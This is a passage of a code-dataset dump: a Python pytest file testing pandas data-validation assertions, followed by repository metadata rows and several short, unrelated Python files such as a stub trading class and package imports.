{
"col_1": ["BA2"],
}
)
with pytest.raises(AssertionError) as excinfo:
self.expect_column_values_to_be_of_type(df, "col_1", object)
assert "Please check available types; str, float, int : " == str(excinfo.value)
def test_pandas_expect_column_values_to_be_of_type_fail(self):
df = pd.DataFrame(
{
"col_1": ["BA2", "BA15", "SW1"],
"col_2": [10, 20, 30],
"col_3": [10.45, 20.32, 30.23],
}
)
with pytest.raises(AssertionError) as excinfo:
self.expect_column_values_to_be_of_type(df, "col_1", int)
assert "Column col_1 was not type <class 'int'> : " == str(excinfo.value)
with pytest.raises(AssertionError) as excinfo:
self.expect_column_values_to_be_of_type(df, "col_2", float)
assert "Column col_2 was not type <class 'float'> : " == str(excinfo.value)
with pytest.raises(AssertionError) as excinfo:
self.expect_column_values_to_be_of_type(df, "col_3", str)
assert "Column col_3 was not type <class 'str'> : " == str(excinfo.value)
def test_assert_pandas_expect_table_columns_to_match_ordered_list(
self,
):
df = pd.DataFrame({"col_1": [100], "col_2": ["a"], "col_3": [1.01]})
self.expect_table_columns_to_match_ordered_list(
df, list(("col_1", "col_2", "col_3"))
)
def test_assert_pandas_expect_table_columns_to_match_ordered_list_fail(
self,
):
df = pd.DataFrame({"col_1": [100], "col_2": ["a"], "col_3": [1.01]})
with pytest.raises(AssertionError) as excinfo:
self.expect_table_columns_to_match_ordered_list(
df, list(("col_2", "col_1", "col_3"))
)
assert (
"Ordered columns did not match ordered columns col_1, col_2, col_3 : "
== str(excinfo.value)
)
def test_assert_pandas_expect_table_columns_to_match_set(self):
df = pd.DataFrame({"col_1": [100], "col_2": ["a"], "col_3": [1.01]})
self.expect_table_columns_to_match_set(df, set(("col_1", "col_2", "col_3")))
self.expect_table_columns_to_match_set(df, set(("col_2", "col_1", "col_3")))
self.expect_table_columns_to_match_set(df, list(("col_1", "col_2", "col_3")))
self.expect_table_columns_to_match_set(df, list(("col_2", "col_1", "col_3")))
def test_assert_pandas_expect_table_columns_to_match_set_fail(self):
df = pd.DataFrame({"col_1": [100], "col_2": ["a"], "col_3": [1.01]})
with pytest.raises(AssertionError) as excinfo:
self.expect_table_columns_to_match_set(df, set(("col_2", "col_1")))
assert "Columns did not match set found col_1, col_2, col_3 : " == str(
excinfo.value
)
with pytest.raises(AssertionError) as excinfo:
self.expect_table_columns_to_match_set(df, list(("col_2", "col_1")))
assert "Columns did not match set found col_1, col_2, col_3 : " == str(
excinfo.value
)
def test_assert_expect_date_range_to_be_less_than(self):
df = pd.DataFrame({"col_1": ["2019-05-13", "2018-12-12", "2015-10-01"]})
self.expect_date_range_to_be_less_than(df, "col_1", "2019-05-14")
def test_assert_expect_date_range_to_be_less_than_default(self):
df = pd.DataFrame({"col_1": ["", None]})
self.expect_date_range_to_be_less_than(df, "col_1", "1900-01-02")
def test_assert_expect_date_range_to_be_less_than_formatted(self):
df = pd.DataFrame({"col_1": ["2019/05/13", "2018/12/12", "2015/10/01"]})
self.expect_date_range_to_be_less_than(
df, "col_1", "2019/05/14", date_format="%Y/%m/%d"
)
def test_assert_expect_date_range_to_be_less_than_fail(self):
df = pd.DataFrame({"col_1": ["2019-05-13", "2018-12-12", "2015-10-01"]})
with pytest.raises(AssertionError) as excinfo:
self.expect_date_range_to_be_less_than(df, "col_1", "2019-05-13")
assert (
"Column col_1 date is greater or equal than 2019-05-13 found 2019-05-13 : "
== str(excinfo.value)
)
def test_assert_expect_date_range_to_be_more_than(self):
df = pd.DataFrame({"col_1": ["2019-05-13", "2018-12-12", "2015-10-01"]})
self.expect_date_range_to_be_more_than(df, "col_1", "2015-09-30")
def test_assert_expect_date_range_to_be_more_than_default(self):
df = pd.DataFrame({"col_1": [""]})
self.expect_date_range_to_be_more_than(df, "col_1", "1899-12-31")
def test_assert_expect_date_range_to_be_more_than_fail(self):
df = pd.DataFrame({"col_1": ["2019-05-13", "2018-12-12", "2015-10-01"]})
with pytest.raises(AssertionError) as excinfo:
self.expect_date_range_to_be_more_than(df, "col_1", "2015-10-01")
assert (
"Column col_1 is less or equal than 2015-10-01 found 2015-10-01 : "
== str(excinfo.value)
)
def test_assert_expect_date_range_to_be_between(self):
df = pd.DataFrame({"col_1": ["2010-01-02", "2025-01-01"]})
self.expect_date_range_to_be_between(
df, "col_1", date_start="2010-01-01", date_end="2025-01-02"
)
def test_assert_expect_date_range_to_be_between_start_date_greater_than_end(
self,
):
df = pd.DataFrame({"col_1": ["1975-01-01"]})
with pytest.raises(AssertionError) as excinfo:
self.expect_date_range_to_be_between(
df, "col_1", date_start="1950-01-02", date_end="1950-01-01"
)
assert (
"Column col_1 start date 1950-01-02 cannot be greater than end_date 1950-01-01 : "
== str(excinfo.value)
)
def test_assert_expect_date_range_to_be_between_fail(self):
df = pd.DataFrame({"col_1": ["2010-01-02", "2025-01-02"]})
with pytest.raises(AssertionError) as excinfo:
self.expect_date_range_to_be_between(
df, "col_1", date_start="2010-01-03", date_end="2025-01-03"
)
assert (
"Column col_1 is not between 2010-01-03 and 2025-01-03 found 2010-01-02 : "
== str(excinfo.value)
)
with pytest.raises(AssertionError) as excinfo:
self.expect_date_range_to_be_between(
df, "col_1", date_start="2010-01-01", date_end="2025-01-01"
)
assert (
"Column col_1 is not between 2010-01-01 and 2025-01-01 found 2025-01-02 : "
== str(excinfo.value)
)
def test_assert_expect_date_range_to_be_between_fail_equal(self):
df = pd.DataFrame({"col_1": ["2010-01-02", "2025-01-02"]})
with pytest.raises(AssertionError) as excinfo:
self.expect_date_range_to_be_between(
df, "col_1", date_start="2010-01-02", date_end="2025-01-03"
)
assert (
"Column col_1 is not between 2010-01-02 and 2025-01-03 found 2010-01-02 : "
== str(excinfo.value)
)
with pytest.raises(AssertionError) as excinfo:
self.expect_date_range_to_be_between(
df, "col_1", date_start="2010-01-01", date_end="2025-01-02"
)
assert (
"Column col_1 is not between 2010-01-01 and 2025-01-02 found 2025-01-02 : "
== str(excinfo.value)
)
def test_expect_column_mean_to_be_between(self):
df = pd.DataFrame({"col_1": [100.05, 200.01, 300.05]})
self.expect_column_mean_to_be_between(df, "col_1", 100.0, 400.0)
def test_expect_column_mean_to_be_between_min_greater_than_max_fail(
self,
):
df = pd.DataFrame({"col_1": [100.05, 200.01, 300.05]})
with pytest.raises(AssertionError) as excinfo:
self.expect_column_mean_to_be_between(df, "col_1", 200.0, 100.0)
assert (
"Column col_1 min_value 200.0 cannot be greater than max_value 100.0 : "
== str(excinfo.value)
)
def test_expect_column_mean_to_be_between_fail_min_value(self):
df = pd.DataFrame({"col_1": [100.05, 200.01, 300.05]})
with pytest.raises(AssertionError) as excinfo:
self.expect_column_mean_to_be_between(df, "col_1", 300.0, 400.0)
assert "Column col_1 mean 200.03667 is less than min_value 300.0 : " == str(
excinfo.value
)
def test_expect_column_mean_to_be_between_fail_max_value(self):
df = pd.DataFrame({"col_1": [100.05, 200.01, 300.05]})
with pytest.raises(AssertionError) as excinfo:
self.expect_column_mean_to_be_between(df, "col_1", 100.0, 200.0)
assert "Column col_1 mean 200.03667 is greater than max_value 200.0 : " == str(
excinfo.value
)
def test_expect_column_value_counts_percent_to_be_between(self):
df = pd.DataFrame(
{
"col_1": ["Y", "Y", "N", "Y", "Y", "N", "N", "Y", "N", ""],
}
)
value_counts = {
"Y": {"min": 45, "max": 55},
"N": {"min": 35, "max": 45},
"": {"min": 5, "max": 15},
}
self.expect_column_value_counts_percent_to_be_between(df, "col_1", value_counts)
def test_expect_column_value_counts_percent_to_be_between_fail_min(self):
df = pd.DataFrame(
{
"col_1": ["Y", "Y", "N", "Y", "Y", "N", "N", "Y", "Y", "", "N", ""],
}
)
value_counts = {"Y": {"min": 55, "max": 65}}
with pytest.raises(AssertionError) as excinfo:
self.expect_column_value_counts_percent_to_be_between(
df, "col_1", value_counts
)
assert (
"Column col_1 the actual value count of (Y) is 50.00000% is less than the min allowed of 55% : "
== str(excinfo.value)
)
def test_expect_column_value_counts_percent_to_be_between_fail_max(self):
df = pd.DataFrame(
{
"col_1": ["Y", "Y", "N", "Y", "Y", "N", "N", "Y", "Y", "", "N", ""],
}
)
value_counts = {"Y": {"min": 35, "max": 40}}
with pytest.raises(AssertionError) as excinfo:
self.expect_column_value_counts_percent_to_be_between(
df, "col_1", value_counts
)
assert (
"Column col_1 the actual value count of (Y) is 50.00000% is more than the max allowed of 40% : "
== str(excinfo.value)
)
def test_expect_column_value_counts_percent_to_be_between_fail_key_error(self):
df = pd.DataFrame(
{
"col_1": ["Y", "N", "Maybe"],
}
)
value_counts = {"Yes": {"min": 0, "max": 0}}
with pytest.raises(AssertionError) as excinfo:
self.expect_column_value_counts_percent_to_be_between(
df, "col_1", value_counts
)
assert (
"Check the key 'Yes' is not in the available value counts names Maybe, N, Y : "
== str(excinfo.value)
)
def test_expect_column_value_counts_percent_to_be_between_fail_min_max_key_error(
self,
):
df = pd.DataFrame(
{
"col_1": ["Y"],
}
)
# Assert verify min
value_counts = {"Y": {"minimum": 0, "max": 0}}
with pytest.raises(AssertionError) as excinfo:
self.expect_column_value_counts_percent_to_be_between(
df, "col_1", value_counts
)
assert "Value count for key 'Y' not contain 'min' : " == str(excinfo.value)
# Assert verify max
value_counts = {"Y": {"min": 0, "maximum": 0}}
with pytest.raises(AssertionError) as excinfo:
self.expect_column_value_counts_percent_to_be_between(
df, "col_1", value_counts
)
assert "Value count for key 'Y' not contain 'max' : " == str(excinfo.value)
def test_expect_assert_frame_equal(self):
left = pd.DataFrame({"col_1": [1]})
right = pd.DataFrame({"col_1": [1]})
self.expect_frames_equal(left, right)
def test_expect_assert_frame_equal_dtype(self):
left = pd.DataFrame({"col_1": [1, 2]})
right = pd.DataFrame({"col_1": [1, 2]})
left = left.astype({"col_1": "int32"})
right = left.astype({"col_1": "int64"})
self.expect_frames_equal(left, right, check_dtype=False)
def test_expect_assert_frame_equal_ignore_index(self):
df = pd.DataFrame({"col_1": [2, 1]})
left = df[df["col_1"] == 1]
right = pd.DataFrame({"col_1": [1]})
self.expect_frames_equal(left, right, check_index=False)
def test_expect_assert_frame_equal_bad_type(self):
from pyspark.sql import SparkSession
left = pd.DataFrame({"col_1": [1]})
spark = SparkSession.builder.getOrCreate()
right = spark.createDataFrame([{"col_1": 100}])
with pytest.raises(AssertionError) as excinfo:
self.expect_frames_equal(left, right)
assert "Different DataFrame types : " == str(excinfo.value)
def test_expect_assert_frame_equal_fail(self):
left = pd.DataFrame({"col_1": [1]})
right = pd.DataFrame({"col_1": [2]})
with pytest.raises(AssertionError) as excinfo:
self.expect_frames_equal(left, right)
# Just check the GA code, the fail is returned
# with panda exception or the GASpark code
assert "DataFrames are different" in str(excinfo.value)
def test_expect_column_value_to_equal(self):
df = pd.DataFrame({"col_1": [1, 1, 1, 1]})
self.expect_column_value_to_equal(df, "col_1", 1)
df = pd.DataFrame({"col_1": ["h", "h", "h", "h"]})
self.expect_column_value_to_equal(df, "col_1", "h")
df = pd.DataFrame({"col_1": [1.1, 1.1, 1.1, 1.1]})
self.expect_column_value_to_equal(df, "col_1", 1.1)
def test_expect_column_value_to_equal_fails(self):
df1 = pd.DataFrame({"col_1": [2, 2, 5, 2]})
with pytest.raises(AssertionError) as excinfo:
self.expect_column_value_to_equal(df1, "col_1", 2)
assert "Column col_1 was not equal, found 5 : " == str(excinfo.value)
df2 = pd.DataFrame({"col_1": ["d", "d", "e", "d"]})
with pytest.raises(AssertionError) as excinfo:
self.expect_column_value_to_equal(df2, "col_1", "d")
assert "Column col_1 was not equal, found e : " == str(excinfo.value)
def test_expect_column_value_to_equal_if(self):
df = pd.DataFrame({"col_1": [1, 2, 1], "col_2": ["a", "b", "a"]})
self.expect_column_value_to_equal_if(df, "col_1", 1, "col_2", "a")
def test_expect_column_value_to_equal_if_fail(self):
df = pd.DataFrame({"col_1": [1, 2, 1], "col_2": ["a", "b", "a"]})
with pytest.raises(AssertionError) as excinfo:
self.expect_column_value_to_equal_if(df, "col_1", 1, "col_2", "b")
assert "Using filter col_1: 1, Column col_2 was not equal, found a : " == str(
excinfo.value
)
def test_expect_column_value_to_be_greater_if(self):
df = pd.DataFrame({"col_1": ["one", "two", "one"], "col_2": [2, 2, 3]})
self.expect_column_value_to_be_greater_if(df, "col_1", "one", "col_2", 1)
def test_expect_column_value_to_be_greater_if_fail(self):
df = pd.DataFrame({"col_1": ["one", "two", "one"], "col_2": [1, 2, 3]})
with pytest.raises(AssertionError) as excinfo:
self.expect_column_value_to_be_greater_if(df, "col_1", "one", "col_2", 3)
assert (
"Using filter col_1: one, Column col_2 was not greater than 3, found 1 : "
== str(excinfo.value)
)
with pytest.raises(AssertionError) as excinfo:
self.expect_column_value_to_be_greater_if(df, "col_1", "one", "col_2", 2)
assert (
"Using filter col_1: one, Column col_2 was not greater than 2, found 1 : "
== str(excinfo.value)
)
def test_expect_column_has_no_duplicate_rows_all(self):
df = pd.DataFrame({"col_1": [1, 2, 3], "col_2": ["a", "b", "c"]})
self.expect_column_has_no_duplicate_rows(df)
def test_expect_column_has_no_duplicate_rows_single(self):
df = pd.DataFrame({"col_1": [1, 2, 3], "col_2": ["a", "b", "c"]})
self.expect_column_has_no_duplicate_rows(df, "col_1")
def test_expect_column_has_no_duplicate_rows_list(self):
df = pd.DataFrame({"col_1": [1, 2, 3], "col_2": ["a", "b", "c"]})
self.expect_column_has_no_duplicate_rows(df, ["col_1", "col_2"])
def test_expect_column_has_no_duplicate_rows_all_fail(self):
df = pd.DataFrame({"col_1": [1, 2, 1, 4]})
with pytest.raises(AssertionError) as excinfo:
self.expect_column_has_no_duplicate_rows(df)
assert "Column col_1 contains a duplicate value : " == str(excinfo.value)
def test_expect_column_has_no_duplicate_rows_all_fail_multi_cols(self):
df = pd.DataFrame({"col_1": [1, 2, 3], "col_2": ["a", "a", "c"]})
with pytest.raises(AssertionError) as excinfo:
self.expect_column_has_no_duplicate_rows(df)
assert "Column col_2 contains a duplicate value : " == str(excinfo.value)
def test_expect_column_has_no_duplicate_rows_single_fail(self):
df = pd.DataFrame({"col_1": [1, 2, 3], "col_2": ["a", "c", "c"]})
with pytest.raises(AssertionError) as excinfo:
self.expect_column_has_no_duplicate_rows(df, "col_2")
assert "Column col_2 contains a duplicate value : " == str(excinfo.value)
def test_expect_column_has_no_duplicate_rows_single_fail_incorrect_col_name(self):
df = pd.DataFrame({"col_1": [1]})
with pytest.raises(AssertionError) as excinfo:
self.expect_column_has_no_duplicate_rows(df, "bla")
assert "Column bla is not valid : " == str(excinfo.value)
with pytest.raises(AssertionError) as excinfo:
self.expect_column_has_no_duplicate_rows(df, ["bla2"])
assert "Column bla2 is not valid : " == str(excinfo.value)
def test_expect_column_has_no_duplicate_rows_list_fail(self):
df = pd.DataFrame({"col_1": [1, 2, 3], "col_2": ["a", "c", "c"]})
with pytest.raises(AssertionError) as excinfo:
self.expect_column_has_no_duplicate_rows(df, ["col_2"])
assert "Column col_2 contains a duplicate value : " == str(excinfo.value)
def test_expect_column_has_no_duplicate_rows_type_unknown(self):
df = pd.DataFrame({"col_1": [1]})
with pytest.raises(AssertionError) as excinfo:
self.expect_column_has_no_duplicate_rows(df, 1)
assert "Check help for method usage : " == str(excinfo.value)
| 39.574409 | 108 | 0.616715 | 4,109 | 28,454 | 3.93064 | 0.058165 | 0.043341 | 0.068479 | 0.07337 | 0.869853 | 0.858894 | 0.831156 | 0.814439 | 0.794192 | 0.754133 | 0 | 0.068699 | 0.250545 | 28,454 | 718 | 109 | 39.629526 | 0.688675 | 0.005131 | 0 | 0.413858 | 0 | 0.011236 | 0.167597 | 0.002438 | 0 | 0 | 0 | 0 | 0.249064 | 1 | 0.132959 | false | 0 | 0.007491 | 0 | 0.142322 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
28206eb653e9277c12e1d30f7a7f06b91b21ec27 | 26 | py | Python | terrascript/tls/__init__.py | vfoucault/python-terrascript | fe82b3d7e79ffa72b7871538f999828be0a115d0 | [
"BSD-2-Clause"
] | null | null | null | terrascript/tls/__init__.py | vfoucault/python-terrascript | fe82b3d7e79ffa72b7871538f999828be0a115d0 | [
"BSD-2-Clause"
] | null | null | null | terrascript/tls/__init__.py | vfoucault/python-terrascript | fe82b3d7e79ffa72b7871538f999828be0a115d0 | [
"BSD-2-Clause"
] | null | null | null | """2017-11-28 18:09:01"""
| 13 | 25 | 0.538462 | 6 | 26 | 2.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.583333 | 0.076923 | 26 | 1 | 26 | 26 | 0 | 0.730769 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
283b7e870558af06fba900fa06370599d26c8b78 | 43 | py | Python | src/options/split/backward/__init__.py | DenDen047/SpatialNetworks | 62a076d12af474b19b406e605d970662d9699cdf | [
"MIT"
] | 3 | 2019-12-15T23:29:11.000Z | 2020-05-08T03:26:20.000Z | src/options/split/backward/__init__.py | DenDen047/SpatialNetworks | 62a076d12af474b19b406e605d970662d9699cdf | [
"MIT"
] | null | null | null | src/options/split/backward/__init__.py | DenDen047/SpatialNetworks | 62a076d12af474b19b406e605d970662d9699cdf | [
"MIT"
] | 3 | 2019-12-30T15:49:57.000Z | 2020-04-30T08:06:18.000Z | from . import greedy, probability, rescale
| 21.5 | 42 | 0.790698 | 5 | 43 | 6.8 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.139535 | 43 | 1 | 43 | 43 | 0.918919 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
9589d8433e043b15f019e1a7d9c8800588a6ea95 | 1,215 | py | Python | mdbacktest/trader.py | matthewmercuri/mdbacktest | 1cb1e0b644a21e264cbb43b66088b28962d8e8dd | [
"MIT"
] | null | null | null | mdbacktest/trader.py | matthewmercuri/mdbacktest | 1cb1e0b644a21e264cbb43b66088b28962d8e8dd | [
"MIT"
] | null | null | null | mdbacktest/trader.py | matthewmercuri/mdbacktest | 1cb1e0b644a21e264cbb43b66088b28962d8e8dd | [
"MIT"
] | null | null | null | class Trade:
def __init__(self):
pass
def buy_stock(self, portfolio, security, units, price):
'''buys security and adds it to the portfolio.
First checks if the trade is valid given the current
positions and cash balance. Logs the trade afterward.
arguments:
portfolio (df): current state of the portfolio
security (str): the ticker of the equity
units (int): the number of units to buy
price (float): the market price to purchase the shares
returns:
portfolio (df): new state of the portfolio after trade
'''
pass
def sell_stock(self, portfolio, security, units, price):
'''sells security and removes it from the portfolio.
First checks if the trade is valid given the current
positions and cash balance. Logs the trade afterward.
arguments:
portfolio (df): current state of the portfolio
security (str): the ticker of the equity
units (int): the number of units to sell
price (float): the market price to sell the shares
returns:
portfolio (df): new state of the portfolio after trade
'''
pass
| 32.837838 | 62 | 0.632922 | 160 | 1,215 | 4.76875 | 0.3125 | 0.094364 | 0.052425 | 0.099607 | 0.857143 | 0.857143 | 0.694626 | 0.694626 | 0.694626 | 0.694626 | 0 | 0 | 0.309465 | 1,215 | 36 | 63 | 33.75 | 0.909416 | 0.678189 | 0 | 0.428571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.428571 | false | 0.428571 | 0 | 0 | 0.571429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 6 |
95ed199311cbda3e4b5a1150bbe09bf4f22ef233 | 19 | py | Python | avl/__init__.py | jameshicks/avl | 6807cf3a3c9f4c32c090e0e0f29ffb74c0a78199 | [
"MIT"
] | null | null | null | avl/__init__.py | jameshicks/avl | 6807cf3a3c9f4c32c090e0e0f29ffb74c0a78199 | [
"MIT"
] | null | null | null | avl/__init__.py | jameshicks/avl | 6807cf3a3c9f4c32c090e0e0f29ffb74c0a78199 | [
"MIT"
] | null | null | null | from .avl import *
| 9.5 | 18 | 0.684211 | 3 | 19 | 4.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.210526 | 19 | 1 | 19 | 19 | 0.866667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
95efa1e0ec0d202c016caab2bc3cf3b8f4c2ad83 | 94 | py | Python | os/cpu_ram.py | janbodnar/Python-Course | 51705ab5a2adef52bcdb99a800e94c0d67144a38 | [
"BSD-2-Clause"
] | 13 | 2017-08-22T12:26:07.000Z | 2021-07-29T16:13:50.000Z | os/cpu_ram.py | janbodnar/Python-Course | 51705ab5a2adef52bcdb99a800e94c0d67144a38 | [
"BSD-2-Clause"
] | 1 | 2021-02-08T10:24:33.000Z | 2021-02-08T10:24:33.000Z | os/cpu_ram.py | janbodnar/Python-Course | 51705ab5a2adef52bcdb99a800e94c0d67144a38 | [
"BSD-2-Clause"
] | 17 | 2018-08-13T11:10:33.000Z | 2021-07-29T16:14:02.000Z | #!/usr/bin/python
import psutil
print(psutil.cpu_percent())
print(psutil.virtual_memory())
| 13.428571 | 31 | 0.755319 | 13 | 94 | 5.307692 | 0.769231 | 0.318841 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.085106 | 94 | 6 | 32 | 15.666667 | 0.802326 | 0.170213 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0.666667 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 6 |
25485990abce5aaa2b6682145c9e4be487ac3ef4 | 128 | py | Python | src/choice/abstract_choices_factory.py | xlurio/RockPaperScissorsPy | 927bbd1480dbca70c9bc3b982f4034ac2ff33c57 | [
"MIT"
] | null | null | null | src/choice/abstract_choices_factory.py | xlurio/RockPaperScissorsPy | 927bbd1480dbca70c9bc3b982f4034ac2ff33c57 | [
"MIT"
] | null | null | null | src/choice/abstract_choices_factory.py | xlurio/RockPaperScissorsPy | 927bbd1480dbca70c9bc3b982f4034ac2ff33c57 | [
"MIT"
] | null | null | null | class AbstractChoicesFactory:
def make_player1_choice(self):
pass
def make_player2_choice(self):
pass
| 16 | 34 | 0.679688 | 14 | 128 | 5.928571 | 0.642857 | 0.168675 | 0.337349 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021277 | 0.265625 | 128 | 7 | 35 | 18.285714 | 0.861702 | 0 | 0 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0.4 | 0 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 6 |
c2595fec4eb23f03fa057ebdf7c951d8137f139c | 149 | py | Python | dispatchsdk/__init__.py | DispatchMe/python-sdk | c571968d966f0bcfea4ab5ef7ed1e32596cf4d3b | [
"MIT"
] | 1 | 2020-05-28T15:27:45.000Z | 2020-05-28T15:27:45.000Z | dispatchsdk/__init__.py | DispatchMe/python-sdk | c571968d966f0bcfea4ab5ef7ed1e32596cf4d3b | [
"MIT"
] | null | null | null | dispatchsdk/__init__.py | DispatchMe/python-sdk | c571968d966f0bcfea4ab5ef7ed1e32596cf4d3b | [
"MIT"
] | null | null | null | from dispatchsdk.client import Client
from dispatchsdk.connector import ConnectorClient
from dispatchsdk.errors import ValidationError, RequestError
| 37.25 | 60 | 0.885906 | 16 | 149 | 8.25 | 0.5625 | 0.340909 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.087248 | 149 | 3 | 61 | 49.666667 | 0.970588 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
c260d1e2b7d206a56ee9d2aa5d024fcc1419d633 | 132 | py | Python | colour_hdri/tonemapping/__init__.py | colour-science/colour-hdri | 3a97c4ad8bc328e2fffabf84ac8b56d795dbeb82 | [
"BSD-3-Clause"
] | 92 | 2015-09-19T22:11:15.000Z | 2022-03-13T06:37:53.000Z | colour_hdri/tonemapping/__init__.py | colour-science/colour-hdri | 3a97c4ad8bc328e2fffabf84ac8b56d795dbeb82 | [
"BSD-3-Clause"
] | 24 | 2017-05-25T08:55:10.000Z | 2022-03-30T18:26:43.000Z | colour_hdri/tonemapping/__init__.py | colour-science/colour-hdri | 3a97c4ad8bc328e2fffabf84ac8b56d795dbeb82 | [
"BSD-3-Clause"
] | 9 | 2016-01-18T17:29:51.000Z | 2020-11-12T12:54:18.000Z | # -*- coding: utf-8 -*-
from .global_operators import * # noqa
from . import global_operators
__all__ = global_operators.__all__
| 18.857143 | 39 | 0.727273 | 16 | 132 | 5.3125 | 0.5625 | 0.529412 | 0.423529 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009009 | 0.159091 | 132 | 6 | 40 | 22 | 0.756757 | 0.19697 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
c29949d89ade73ac3a94cfd174010ec25f402b89 | 43 | py | Python | mitty/plugins/variants/__init__.py | latticelabs/Mitty-deprecated- | bf192600233daea8a42a1f995c60b1e883cbaaba | [
"Apache-2.0"
] | 1 | 2015-10-21T23:43:34.000Z | 2015-10-21T23:43:34.000Z | mitty/plugins/variants/__init__.py | latticelabs/Mitty | bf192600233daea8a42a1f995c60b1e883cbaaba | [
"Apache-2.0"
] | null | null | null | mitty/plugins/variants/__init__.py | latticelabs/Mitty | bf192600233daea8a42a1f995c60b1e883cbaaba | [
"Apache-2.0"
] | null | null | null | from mitty.plugins.variants.common import * | 43 | 43 | 0.837209 | 6 | 43 | 6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.069767 | 43 | 1 | 43 | 43 | 0.9 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
c2c00d2dc5b3a636a0560a69aa3d24d55d2010dc | 4,046 | py | Python | Code/models/SVM/lSVC.py | SimonKenoby/Master-Thesis-Fake-News-Dectection | 2c3a5e82d4c7d6294ca87c265a1b638d61f2cb08 | [
"MIT"
] | 3 | 2020-06-04T22:39:57.000Z | 2022-02-16T08:15:14.000Z | Code/models/SVM/lSVC.py | SimonKenoby/Master-Thesis-Fake-News-Dectection | 2c3a5e82d4c7d6294ca87c265a1b638d61f2cb08 | [
"MIT"
